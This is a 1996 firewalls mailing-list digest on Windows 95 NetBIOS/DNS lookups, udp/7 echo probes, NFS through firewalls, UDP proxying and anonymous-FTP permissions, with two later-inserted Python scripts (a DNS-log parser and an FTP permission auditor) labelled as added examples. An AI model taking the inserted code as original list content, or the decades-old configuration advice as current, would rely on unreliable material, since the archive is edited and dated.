TCP/IP protocol, and use NetBEUI or IPX/SPX as the only protocol for Client for Microsoft Networks. NetBios will not be carried over TCP/IP in that case, and DNS resolution will never come into play. 
Cheers, Russ Cooper, Senior Consultant - Internet SHL/Computer Innovations - Consulting Services Russ.Cooper@RC.Toronto.On.Ca - RWCooper@SHL.Com "Do you have the vision to see my future as I have projected it?" From firewalls-owner Sun Feb 4 11:54:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA04922 for firewalls-outgoing; Sun, 4 Feb 1996 11:43:15 -0800 (PST) Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA04917 for ; Sun, 4 Feb 1996 11:43:11 -0800 (PST) Received: from maestro.Maestro.COM by relay1.UU.NET with SMTP id QQabms24985; Sun, 4 Feb 1996 14:40:42 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA28023; Sun, 4 Feb 96 13:30:42 EST Date: Sun, 4 Feb 1996 13:30:41 -0500 (EST) From: Sick Puppy To: "Russ.Cooper@RC.Toronto.on.ca" Cc: "'Firewalls'" Subject: RE: Negative impact of Windows 95 on firewall performance In-Reply-To: <01BAF2FC.1BCE5F60@rwcooper.RC.Toronto.on.ca> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > As I suggested this before, I assume you want to know what to do if you do > not have an NT WINS Server, is this correct? Enlightenment slowly cleared the confused mind of the stupid dawg. Well, yes. I sincerely appreciate your advice. So will the other dawgs I was talking to, on account of we was all confused together. 
Sick Puppy
cDm

From firewalls-owner Sun Feb 4 12:08:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA05067 for firewalls-outgoing; Sun, 4 Feb 1996 11:52:56 -0800 (PST)
Received: from belize.ucs.indiana.edu (belize.ucs.indiana.edu [129.79.10.64]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA05053 for ; Sun, 4 Feb 1996 11:52:51 -0800 (PST)
Received: from othello.ucs.indiana.edu (root@othello.ucs.indiana.edu [129.79.10.45]) by belize.ucs.indiana.edu (8.7.3/8.7.3/1.10IUPO) with ESMTP id OAA02737 for ; Sun, 4 Feb 1996 14:50:02 -0500 (EST)
Received: from defiant.ucs.indiana.edu (xyplex3-3-14.ucs.indiana.edu [129.79.18.194]) by othello.ucs.indiana.edu (8.7/8.7/regexp($Revision: 1.3 $) with SMTP id OAA10950 for ; Sun, 4 Feb 1996 14:51:56 -0500 (EST)
Message-Id: <1.5.4b11.32.19960204205328.00680500@192.168.2.100>
X-Sender: jlundin@192.168.2.100
X-Mailer: Windows Eudora Light Version 1.5.4b11 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 04 Feb 1996 14:53:28 -0600
To: firewalls@GreatCircle.com
From: Wally the Craw Wurm
Subject: CERN httpd man page
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Is there a man page for the CERN httpd? All my searches for it come up with nothing but binaries.

Thanks
Jeremy Lundin

------------------------------------------------------------------------------
You have been touched by the wisdom of Wally the Craw Wurm. Be proud.
Jer Lundin                          Email: jlundin@indiana.edu
300 East Matlock, Apt. #26          WWW: Coming Soon!
Bloomington, IN 47408               Voice: (812)336-5444
------------------------------------------------------------------------------

From firewalls-owner Sun Feb 4 13:38:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA07729 for firewalls-outgoing; Sun, 4 Feb 1996 13:31:24 -0800 (PST)
Received: from eagle1.raptor.com (raptor.com [204.7.243.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA07724 for ; Sun, 4 Feb 1996 13:30:57 -0800 (PST)
Received: from raptor1.raptor.com ([204.7.242.10]) by eagle1.raptor.com via smtpd (for miles.greatcircle.com [198.102.244.34]) with SMTP; 4 Feb 1996 21:28:14 UT
Received: from eagle1a.raptor.com (eagle1a.raptor.com [204.7.242.1]) by raptor1.raptor.com (8.7.1/8.7.1) with SMTP id QAA11458 for ; Sun, 4 Feb 1996 16:20:02 -0500 (EST)
Date: Sun, 4 Feb 1996 16:20:02 -0500 (EST)
Message-Id: <199602042120.QAA11458@raptor1.raptor.com>
From: Tony Ferro
To: firewalls@GreatCircle.COM
Received: from tferro.vip.best.com ([204.156.134.157]) by eagle1a.raptor.com via smtpd (for raptor1.raptor.com [204.7.242.10]) with SMTP; 4 Feb 1996 21:26:12 UT
Subject: Re: PC based sniffer
X-Mailer: ProntoIP [version 2.0]
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi Folks,

I've seen responses for Ethernet sniffers; is there any software available for sniffing your SLIP/PPP dial connection? I'm using the ShivaPPP NDIS dialer and its trace features are pretty limited - it can count IP pkts, but can't see inside them.

TIA,
Tony

From firewalls-owner Sun Feb 4 14:26:37 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08813 for firewalls-outgoing; Sun, 4 Feb 1996 14:11:40 -0800 (PST)
Received: from ilinx.ilinx.com (ilinx.bctel.net [204.174.66.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA08795 for ; Sun, 4 Feb 1996 14:11:25 -0800 (PST)
Received: by ilinx.ilinx.com (/\==/\ Smail3.1.28.1 #28.1) id ; Sun, 4 Feb 96 14:10 PST
Message-Id:
From: brian@ilinx.ilinx.com (Brian J. Murrell)
Date: Sun, 4 Feb 1996 14:10:10 -0800 (PST)
To: firewalls@GreatCircle.COM
Reply-To: brian@ilinx.bctel.net, brian_murrell@bctel.net
Subject: anybody know of any vulnerabilities with "echo"
X-Mailer: Ishmail 1.2-960125-386
MIME-Version: 1.0
Content-Type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi Folks,

At a particular Internet firewall I administer, I've noticed a rash of "echo" (udp port 7) service attempts. These came on pretty suddenly (as if a whole shwack of people found something out) and are pretty constant now. I'm wondering if a new vulnerability with the (a particular implementation maybe) echo server has been found.

Anybody else notice this trend??

b.

-- 
Brian J. Murrell                                    brian@ilinx.com
InterLinx Support Services, Inc.                    brian@wimsey.com
North Vancouver, B.C.                               604 983 UNIX
Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD

From firewalls-owner Sun Feb 4 14:38:31 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08854 for firewalls-outgoing; Sun, 4 Feb 1996 14:14:32 -0800 (PST)
Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA08847 for ; Sun, 4 Feb 1996 14:14:28 -0800 (PST)
Received: from pferguso-pc.cisco.com (c3robo12.cisco.com [171.68.13.76]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id OAA04169; Sun, 4 Feb 1996 14:11:03 -0800
Message-Id: <199602042211.OAA04169@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 04 Feb 1996 17:11:41 -0500
To: Tony Ferro
From: Paul Ferguson
Subject: Re: PC based sniffer
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi, Tony.

How's it going at Raptor?

- paul

At 04:20 PM 2/4/96 -0500, Tony Ferro wrote:
>Hi Folks,
>
>I've seen responses for ethernet sniffers, is there any software available
>for sniffing your SLIP/PPP dial connection? I'm using ShivaPPP ndis dialer
>and its trace features are pretty limited - can count IP pkts, but can't
>see inside them.
>
>TIA,
>Tony
>

--
Paul Ferguson                                  ||        ||
Consulting Engineering                         ||        ||
Reston, Virginia USA                          ||||      ||||
tel: +1.703.716.9538                      ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com                c i s c o  S y s t e m s

From firewalls-owner Sun Feb 4 15:23:27 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10424 for firewalls-outgoing; Sun, 4 Feb 1996 15:09:30 -0800 (PST)
Received: from netlink.co.nz (NLserver1.netlink.co.nz [202.20.93.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA10412 for ; Sun, 4 Feb 1996 15:09:25 -0800 (PST)
Received: from manukau.govt.nz (kotuku.manukau.govt.nz [202.14.82.1]) by netlink.co.nz (8.6.12/8.6.6) with SMTP id MAA11751 for ; Mon, 5 Feb 1996 12:08:26 +1300
Received: from MAIN-Message_Server by manukau.govt.nz with Novell_GroupWise; Mon, 05 Feb 1996 12:11:28 +1200
Message-Id:
X-Mailer: Novell GroupWise 4.1
Date: Mon, 05 Feb 1996 10:46:08 +1200
From: Matthew Thompson
To: firewalls@greatcircle.com
Subject: FW: Windows 95 clobbering firewall? -Reply
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Imagine that: a system told to use DNS for NetBIOS name resolution actually tries to use DNS for NetBIOS name resolution :-)

'Course you could enter these PCs into the DNS and watch the problem evaporate... Or configure DHCP+WINS.

See Win NT Resource Kit 3.5, NT Networking Guide chapter 12 pg 201 for a discussion of WINS, broadcast and DNS name resolution for Win NT IP clients.
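As an added example (not from any post in this thread), a small Python script that picks out, from a resolver query log, the clients generating NetBIOS-style lookups, so they can be entered into DNS or pointed at WINS as suggested above. The log layout, addresses and host names are constructed for the example; the only fact relied on is that a NetBIOS name is a single label of at most 15 characters.

```python
import re
from collections import defaultdict

# Constructed sample resolver query log in a simplified
# "date time client-ip query-name query-type" layout. The layout, the
# addresses and the names are assumptions made for this example, not
# output of any real DNS server.
SAMPLE_LOG = """\
1996-02-04 12:01:03 192.168.2.100 WORKSTATION01 A
1996-02-04 12:01:03 192.168.2.100 WORKSTATION01 A
1996-02-04 12:01:04 192.168.2.100 PRINTSRV A
1996-02-04 12:01:05 192.168.2.101 www.greatcircle.com A
1996-02-04 12:01:06 192.168.2.102 FILESRV A
1996-02-04 12:01:06 192.168.2.100 FILESRV A
1996-02-04 12:01:07 192.168.2.100 NTSERVER1 A
1996-02-04 12:01:08 192.168.2.101 ftp.cert.org A
garbage line that does not parse
"""

# date, time, client, name, type: exactly five whitespace-separated fields
LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+)$")


def parse_line(line):
    """Return (client, name, qtype) for a well-formed line, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    _timestamp, client, name, qtype = m.groups()
    return client, name, qtype


def is_netbios_style(name):
    """A NetBIOS name that has fallen through to DNS arrives as a bare
    single label: no dots, and at most 15 characters (the 16th byte of a
    NetBIOS name is the service suffix, which is not part of the label)."""
    name = name.rstrip(".")
    return "." not in name and 1 <= len(name) <= 15


def netbios_leakers(log_text, min_queries=2):
    """Map each client that sent at least min_queries single-label A
    queries to its query count and the distinct names it asked for."""
    counts = defaultdict(int)
    names = defaultdict(set)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip lines that do not fit the expected layout
        client, name, qtype = parsed
        if qtype == "A" and is_netbios_style(name):
            counts[client] += 1
            names[client].add(name.upper())
    return {
        client: {"queries": n, "names": sorted(names[client])}
        for client, n in counts.items()
        if n >= min_queries
    }


if __name__ == "__main__":
    # Clients listed here are candidates for a DNS entry or a WINS setup.
    for client, info in sorted(netbios_leakers(SAMPLE_LOG).items()):
        print(client, info["queries"], ", ".join(info["names"]))
```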
From firewalls-owner Sun Feb 4 15:53:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10602 for firewalls-outgoing; Sun, 4 Feb 1996 15:16:23 -0800 (PST)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA10572 for ; Sun, 4 Feb 1996 15:16:17 -0800 (PST)
Message-Id: <199602042316.PAA10572@miles.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA238755723; Mon, 5 Feb 1996 10:15:23 +1100
From: Darren Reed
Subject: Re: anybody know of any vulnerabilities with "echo"
To: brian@ilinx.bctel.net, brian_murrell@bctel.net
Date: Mon, 5 Feb 1996 10:15:23 +1100 (EDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "Brian J. Murrell" at Feb 4, 96 02:10:10 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Brian J. Murrell, sie said:
> 
> Hi Folks,
> 
> At a particular Internet firewall I administer, I've noticed a rash of
> "echo" (udp port 7) service attempts. These came on pretty suddenly (as if
> a whole shwack of people found something out) and are pretty constant now.

If you disallow ICMP ECHO/ECHOREPLY (i.e. ping doesn't work), then using udp/7 is the next best thing to try to estimate RTT. SATAN and other similar tools can make use of it.

darren

From firewalls-owner Sun Feb 4 15:59:35 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10480 for firewalls-outgoing; Sun, 4 Feb 1996 15:11:35 -0800 (PST)
Received: from Mail.RC.Toronto.on.ca (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA10475 for ; Sun, 4 Feb 1996 15:11:27 -0800 (PST)
Received: from rwcooper.RC.Toronto.on.ca ([205.206.47.2]) by Mail.RC.Toronto.on.ca (post.office MTA v1.9.1 evaluation license) with SMTP id AAA95; Sun, 4 Feb 1996 18:10:22 -0500
Received: by rwcooper.RC.Toronto.on.ca with Microsoft Mail id <01BAF32B.DE6C6920@rwcooper.RC.Toronto.on.ca>; Sun, 4 Feb 1996 18:09:04 -0500
Message-ID: <01BAF32B.DE6C6920@rwcooper.RC.Toronto.on.ca>
From: Russ
To: "firewalls@GreatCircle.COM"
Cc: "'Sick Puppy'"
Subject: RE: Negative impact of Windows 95 on firewall performance
Date: Sun, 4 Feb 1996 18:08:57 -0500
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sick Puppy said...
> The IP stack in Windows 95 allows a machine to use DNS as a last resort
> in resolving NetBIOS names. On early versions there was an advanced
> setup screen which had a tick box "Use DNS for NetBIOS" which allowed
> the user to disable this feature; it was enabled by default. On the
> present Win95 stack an entire subsection of the IP set up relating to
> low-level NetBIOS/IP has been completely eliminated so there is no
> longer a tick box. The subsection that was eliminated also contained
> the "Enable WINS Proxy" flag.

While it's true that you can't disable DNS lookups for NetBIOS names through the GUI anymore, you can still disable it through the registry. However, the method to do this looks like it will disable all DNS functionality.

Key: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP
Entry: EnableDNS
Value: 1 (default = yes)

Change the value to 0 = no, and no more NetBIOS lookups to your DNS, but other DNS lookups will still be executed.

I should also point out that LMHOSTS NetBIOS to IP entries will not be used when DNS is enabled unless they are prefixed with the #PRE option to preload them.

Sorry to have cluttered your mailboxes with all this Microsoft stuff, but I wanted to be able to go to sleep tonight knowing that your firewall DNS will not come crashing down around your ears due to yet another Microsoft IP kerfuffle. ;-]

Cheers,
Russ Cooper, Senior Consultant - Internet
SHL/Computer Innovations - Consulting Services
Russ.Cooper@RC.Toronto.On.Ca - RWCooper@SHL.Com
"Do you have the vision to see my future as I have projected it?"

From firewalls-owner Sun Feb 4 16:08:24 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA11884 for firewalls-outgoing; Sun, 4 Feb 1996 15:54:31 -0800 (PST)
Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA11853 for ; Sun, 4 Feb 1996 15:54:22 -0800 (PST)
Received: from pferguso-pc.cisco.com (c3robo12.cisco.com [171.68.13.76]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id PAA13152 for ; Sun, 4 Feb 1996 15:52:48 -0800
Message-Id: <199602042352.PAA13152@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 04 Feb 1996 18:53:27 -0500
To: firewalls@GreatCircle.COM
From: Paul Ferguson
Subject: Re: PC based sniffer
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Damn. I hate when that happens. Sorry for CC:'ing the list. Must be the weather. :-)

- paul

>X-Sender: pferguso@lint.cisco.com
>Date: Sun, 04 Feb 1996 17:11:41 -0500
>To: Tony Ferro
>From: Paul Ferguson
>Subject: Re: PC based sniffer
>Cc: firewalls@GreatCircle.COM
>Sender: firewalls-owner@GreatCircle.COM
>
>Hi, Tony.
>
>How's it going at Raptor?
>
>- paul
>

From firewalls-owner Sun Feb 4 16:28:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10444 for firewalls-outgoing; Sun, 4 Feb 1996 15:09:53 -0800 (PST)
Received: from staff.cs.su.OZ.AU (staff.cs.su.OZ.AU [129.78.8.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA10430 for ; Sun, 4 Feb 1996 15:09:44 -0800 (PST)
Message-Id: <199602042309.PAA10430@miles.greatcircle.com>
Received: from staff.cs.su.oz.au by staff.cs.su.OZ.AU (mail from rex for firewalls@GreatCircle.COM) with MHSnet; Mon, 05 Feb 1996 10:08:44 +1100
Date: Mon, 05 Feb 1996 09:57:26 +1000
From: rex@staff.cs.su.oz.au (Rex di Bona)
Subject: NFS services and firewalls
To: firewalls@GreatCircle.COM
Reply-To: rex@cs.su.oz.au
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> We have a requirement to provide a network mountable filesystem in a
> shared developement environment between the firewalls of ours and
> another company.
>
>                  _________
>   us -------|_  fw-1  _|--------- them
>   NFS clients  |  \ /  |  NFS clients
>                |__\___/__|
>                    __|___
>                   | NFS  |
>                   |server|
>                   |______|
>
>
> Under this configuration is it possible for 'us' to achieve a high
> level of security for our internal network under this configuration.
> We understand that FW-1 v2.0 makes it possible to selectivly pass NFS
> (v2) traffic through the firewall.

Given that, once you know an NFS file handle cookie, you can access that file (or directory hierarchy) as any non-root user, allowing multiple, independent exports gains you nothing - there really is nothing very secure about NFS.

Now if you want something more secure for serving NFS then boy, I have a product for you :-) (Commercial plug :-)

If all the disks that are NFS exported from the server are to be used by BOTH companies, and if all data can be easily accessed by all people at both companies, then yes, this is a satisfactory solution to your problem. Just make sure that only the data disk is shared, and is shared with the same perms to both sides.

> We would make the server as secure as possible with almost no logins,
> functionally limited to the main task of serving NFS and only NFS mount
> connections permitted incoming from them. From our side to the server
> appropriate outgoing access for management and NFS client connections.

Why have any logins? The machine will have a console?

> How easy is it for someone to compromise internal hosts via the NFS server?

Only if internal hosts depended on the NFS server for system data. If the NFS server only contains 'business' data all you can lose is your business :-) I.e. consider all things on the NFS server as publicly readable/writable - does this affect your decision to use an NFS server?

> If there is a serious problem with this, would using NFS (v3) significantly
> improve things?

I can't say, as I still haven't found a copy of the NFS v3 spec (not that I've looked hard) - anybody know of a URL?

> 
> Ian H. Good            (604) 293-5113        igood@mpr.ca
> MPR Teltech Ltd.       fax (604) 293-5787    http://www.mpr.ca/
> Burnaby BC Canada V5A-4B5
> 

From firewalls-owner Sun Feb 4 16:35:52 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10986 for firewalls-outgoing; Sun, 4 Feb 1996 15:26:38 -0800 (PST)
Received: from ns1.ncic.net ([204.144.225.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA10981 for ; Sun, 4 Feb 1996 15:26:34 -0800 (PST)
Received: (from jamison@localhost) by ns1.ncic.net (8.6.12/8.6.9) id MAA08599 for firewalls@greatcircle.com; Sun, 4 Feb 1996 12:55:06 -0700
Date: Sun, 4 Feb 1996 12:55:06 -0700
From: Jamison Gulden
Message-Id: <199602041955.MAA08599@ns1.ncic.net>
To: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Thanks to all who responded to my post about UDP proxying. Here are some comments and a summary:

Most replies were responses to my saying:

> We've based our protocol on both UDP and TCP and have significant
> reasons for wanting to use UDP. I've seen some reluctance from
> folks here to pass anything that smells of UDP.

This last sentence was more in humor than my not understanding the problems. But thanks to all who tried to educate me on the subject.

My basic question is how to support firewalls if we are developing a protocol based upon UDP. Should we use an existing mechanism like SOCKS V5 or build our own?

Most replies said "just say no" to UDP. What I may not have made clear is that we have included strong per-packet authentication in our protocol which hopefully will calm most sysadmins' fears.

About all I got was a couple of people who said they don't use SOCKS and a couple who want real application proxies. Is a "real application proxy" just one written for a specific application?

Responses:
---------------------
> From proberts@clark.net Sat Jan 27 22:10:47 1996
> I have some specific proxy ideas that I'd like to discuss, to see
> how much their impact on the development process is. I'd say a
> *really* good start would be a fixed port number on both the client and

I don't think I like the idea of fixed port numbers for the client. This would not allow multiple clients to run concurrently and may make the client more prone to attack. Any comments on that last statement?

> > BTW, does anyone use SOCKS? Is it worth supporting now?
>
> I'd like to see real application proxies. Socks isn't in use at any of my
> company's sites (so far as I know), though V5 is starting to look
> interesting.
>
> > Actually, we are trying to build in a fairly high level of
> > authentication into the protocol.
>
> Authentication of the client, or the packet?

Authentication is on a per-packet basis.

---------------------
> From: Ted Stockwell
>
> > BTW, does anyone use SOCKS? Is it worth supporting now?
>
> I can't say. Sidewinder doesn't support socks because it, like other
> firewalls with transparent proxies, doesn't need it.
>
> > What would other firewall maintainers want out of a company
> > developing a new protocol based upon UDP?
>
> That's a tough question. I'd like to understand the networking
> requirements of the application better, and then look at what this
> means for a firewall.

The clients are meant to run continuously while a user is logged in and will occasionally need to send small messages to the server. The server may send small messages back to the client at any time. It would not work well to keep a TCP connection open at all times, and the messages are small enough that the TCP overhead of setting up a connection for each message is significant.

---------------------
> From: Darren Reed
>
> > Basically my question boils down to this:
> > If you have to create a new protocol what is the best way to
> > support firewalls?
>
> Make sure it can work with an application level gateway of some
> sort, invisibly, if need be.
>
> > What would other firewall maintainers want out of a company
> > developing a new protocol based upon UDP?
>
> A protocol spec including rationale for using UDP ?
>
> However, if I read your mail right, your new protocol isn't UDP or TCP,
> but a protocol at the IP level. You might wish to submit an RFC to the
> RFC as experimental or even submit it to the right group as a draft for
> movement through the official standards track. Or even do this anyway ?

Actually, we do plan on using UDP as the basis, if for no other reason than UDP seems to be the lowest-overhead protocol available above IP. I suppose we could build directly on top of IP but I'm not sure what implications that might have on things like network routing, filtering, firewalls, cross-platform availability, etc.

---------------------
> From: Tim Keanini
>
> > > We've based our protocol on both UDP and TCP and have significant
> > > reasons for wanting to use UDP.
>
> I would like to take a few lines to put my spin on this.
> Protocols "work" when they can implement the policy to the letter.
> If the policy is based on who has initiated the connection, that
> sort of policy sticks well to TCP but slides right off of UDP.
> [...]
> Things start to get real interesting when you have a policy like
> "anyone with a blue hat can enter" and all you have is a doorknob
> to work with. Time to call MacGyver.

The idea is that there is a client and a server. The client can talk to the server and the server can talk to any of the clients. Every UDP packet has authentication information to validate if the packet was actually sent by who it supposedly came from.

> The state based packet filters help you "manage the risk" of
> not knowing who really set up the connection of UDP but that
> is something that is all that we can do.
>
> If we are doing anything right, our job is to manage risk.

If I've done my job right, the proper management of those risks will have been built into the protocol with sufficient assurance that it cannot easily be hacked.

Thanks,
Jamie

From firewalls-owner Sun Feb 4 16:53:24 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA14604 for firewalls-outgoing; Sun, 4 Feb 1996 16:38:31 -0800 (PST)
Received: from ncelec.com ([199.238.59.23]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA14597 for ; Sun, 4 Feb 1996 16:38:25 -0800 (PST)
Received: from mculver by ncelec.com (5.4R3.10/200.2.1.5) id AA17750; Sun, 4 Feb 1996 16:31:45 -0800
Message-Id: <2.2.32.19960205003625.0069edd0@ncelec.com>
X-Sender: mculver@ncelec.com
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 04 Feb 1996 16:36:25 -0800
To: "Russ.Cooper@RC.Toronto.on.ca"
From: Mike Culver
Subject: RE: Negative impact of Windows 95 on firewall performance
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Good point! I'm referring to the hosts file on your UNIX server, or wherever DNS lives.

At 05:43 PM 2/4/96 -0500, you wrote:
>"if the "Computer Name" is listed in hosts, I'm fairly certain that the entry works."
>
>Which hosts file are you referring to here, the one on the Windows '95 machine?
>Cheers,
>Russ Cooper, Senior Consultant - Internet
>SHL/Computer Innovations - Consulting Services
>Russ.Cooper@RC.Toronto.On.Ca - RWCooper@SHL.Com
>"Do you have the vision to see my future as I have projected it?"
>
>
>

From firewalls-owner Sun Feb 4 18:13:21 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA18917 for firewalls-outgoing; Sun, 4 Feb 1996 18:03:27 -0800 (PST)
Received: from brolga.cc.uq.oz.au (brolga.cc.uq.oz.au [130.102.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA18912 for ; Sun, 4 Feb 1996 18:03:22 -0800 (PST)
Received: from cc.uq.oz.au by brolga.cc.uq.oz.au id <21447-0@brolga.cc.uq.oz.au>; Mon, 5 Feb 1996 12:01:56 +1000
From: eric@cc.uq.oz.au (Eric Halil)
Date: Mon, 5 Feb 1996 12:01:51 +1000
X-Mailer: Mail User's Shell (7.2.3 5/22/91)
To: Brad VanOrden , maddouri@ensi.rnrt.tn, firewalls@GreatCircle.com
Subject: Re: Securing an anonymous ftp acces
Message-ID: <"brolga.cc.uq:214590:960205020208"@cc.uq.oz.au>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Brad VanOrden writes:
>I would suggest two sources. I have always found "UNIX System Administration
>Handbook" by Evi Nemeth, Garth Snyder, and Scott Seebass to be invaluable
>and they tell you how to set up anonymous ftp. It is published by Prentice
>Hall and had a 2nd edition published about one year ago. You can reach them
>at 800-947-7700.

An excellent book! However, there is a nasty mistake in their recommended permissions and ownerships for files under ~ftp. They suggest that ~ftp be owned by ftp. This can allow intruders to do lots of evil things. A much more secure configuration is to have it owned by root. This has been reported to the authors and will be corrected in a future printing.

>The other is CERT advisory 93:10. It is available via anonymous ftp at:
>cert.org/pub/cert_advisories/CA-93:10.anonymous.FTP.activity. This also
>gives you detailed instructions on how to set up anonymous ftp.

This has more secure permissions for ~ftp and other useful suggestions too.

Eric.
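As an added example that is not from the book, the advisory or any post here, the following Python script audits an anonymous-FTP home directory for the ownership mistake Eric describes: it reports every entry under ~ftp that is not owned by the expected owner (root by default) and every entry that is writable by group or others. The expected-owner parameter, the writability check and the constructed sample tree are assumptions of this example, not text quoted from CA-93:10.

```python
import os
import pwd
import shutil
import stat
import tempfile


def owner_name(uid=None):
    """Resolve a uid (default: the current process's) to a login name,
    falling back to the numeric uid when it has no passwd entry."""
    if uid is None:
        uid = os.getuid()
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)


def audit_ftp_home(root, expected_owner="root"):
    """Walk an anonymous-FTP tree and return a list of (path, problem)
    tuples in walk order. Two problems are reported: an entry whose owner
    is not expected_owner (the ~ftp-owned-by-ftp mistake), and an entry
    that is writable by group or others. Symlinks are inspected with lstat
    and not followed; their mode bits are not meaningful, so only their
    owner is checked."""
    findings = []
    writable_bits = stat.S_IWGRP | stat.S_IWOTH

    def check(path):
        st = os.lstat(path)
        owner = owner_name(st.st_uid)
        if owner != expected_owner:
            findings.append((path, "owned by %s, expected %s" % (owner, expected_owner)))
        if not stat.S_ISLNK(st.st_mode) and st.st_mode & writable_bits:
            findings.append((path, "writable by group or others (mode %o)" % stat.S_IMODE(st.st_mode)))

    check(root)
    for dirpath, dirnames, filenames in os.walk(root):
        for name in sorted(dirnames) + sorted(filenames):
            check(os.path.join(dirpath, name))
    return findings


def build_sample_tree():
    """Create a constructed ~ftp look-alike (pub/README under a fresh
    temporary directory) with read-only modes; returns (root, pub, readme).
    Its owner is whoever runs the script, so audit it with that owner."""
    root = tempfile.mkdtemp(prefix="ftp-audit-")
    pub = os.path.join(root, "pub")
    os.mkdir(pub)
    readme = os.path.join(pub, "README")
    with open(readme, "w") as fh:
        fh.write("constructed sample file\n")
    os.chmod(readme, 0o444)
    os.chmod(pub, 0o555)
    os.chmod(root, 0o555)
    return root, pub, readme


def remove_sample_tree(root):
    """Make the sample tree writable again and delete it."""
    for dirpath, _dirnames, _filenames in os.walk(root):
        os.chmod(dirpath, 0o700)
    shutil.rmtree(root)


if __name__ == "__main__":
    import sys
    # Default target is the ftp account's home, as a shell would expand ~ftp.
    target = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~ftp")
    problems = audit_ftp_home(target)
    for path, problem in problems:
        print("%s: %s" % (path, problem))
    print("%d problem(s) found under %s" % (len(problems), target))
```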
